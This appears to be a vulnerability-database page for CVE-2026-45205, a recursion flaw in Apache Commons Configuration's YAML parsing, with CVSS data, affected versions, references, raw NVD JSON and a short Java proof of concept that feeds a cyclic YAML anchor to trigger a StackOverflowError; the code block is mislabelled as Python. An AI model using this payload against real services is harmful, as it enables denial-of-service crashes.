CVE-2026-45205

Description

Uncontrolled Recursion vulnerability in Apache Commons. When processing an untrusted configuration file, Commons Configuration will throw a StackOverflowError for YAML input with cycles. This issue affects Apache Commons: from 2.2 before 2.15.0. Users are recommended to upgrade to version 2.15.0, which fixes the issue.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Apache Commons Configuration 2.2

Apache Commons Configuration 2.3

Apache Commons Configuration 2.4

Apache Commons Configuration 2.5

Apache Commons Configuration 2.6

Apache Commons Configuration 2.7

Apache Commons Configuration 2.8

Apache Commons Configuration 2.9

Apache Commons Configuration 2.10

Apache Commons Configuration 2.11.0

Apache Commons Configuration 2.11.1

Apache Commons Configuration 2.15.0之前所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import org.apache.commons.configuration2.YAMLConfiguration;
import java.io.StringReader;

public class CVE202645205_PoC {
    public static void main(String[] args) {
        try {
            // Create a YAML configuration instance
            YAMLConfiguration config = new YAMLConfiguration();
            
            // Malicious YAML input with a recursive cycle
            // This structure causes infinite recursion during parsing
            String maliciousYaml = "cycle: &cycle\n  field: *cycle";
            
            // Attempt to read the malicious configuration
            config.read(new StringReader(maliciousYaml));
            
            System.out.println("Exploit failed: StackOverflow not triggered.");
        } catch (StackOverflowError e) {
            System.out.println("Exploit successful: StackOverflowError triggered.");
            e.printStackTrace();
        } catch (Exception e) {
            System.out.println("Other error: " + e.getMessage());
        }
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45205
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45205
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45205/
[4] VulDB https://vuldb.com/cve/CVE-2026-45205
[5] https://github.com/apache/commons-configuration/pull/634
[6] https://lists.apache.org/thread/q3q3j10ohcqhs6o0rg1v7kz6kk27vtkk
[7] http://www.openwall.com/lists/oss-security/2026/05/14/5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45205", "sourceIdentifier": "[email protected]", "published": "2026-05-14T12:16:35.687", "lastModified": "2026-05-14T21:16:48.047", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Recursion vulnerability in Apache Commons.\n\nWhen processing an untrusted configuration file, Commons Configuration will throw a StackOverflowError for YAML input with cycles.\nThis issue affects Apache Commons: from 2.2 before 2.15.0.\n\nUsers are recommended to upgrade to version 2.15.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-674"}]}], "references": [{"url": "https://github.com/apache/commons-configuration/pull/634", "source": "[email protected]"}, {"url": "https://lists.apache.org/thread/q3q3j10ohcqhs6o0rg1v7kz6kk27vtkk", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/14/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}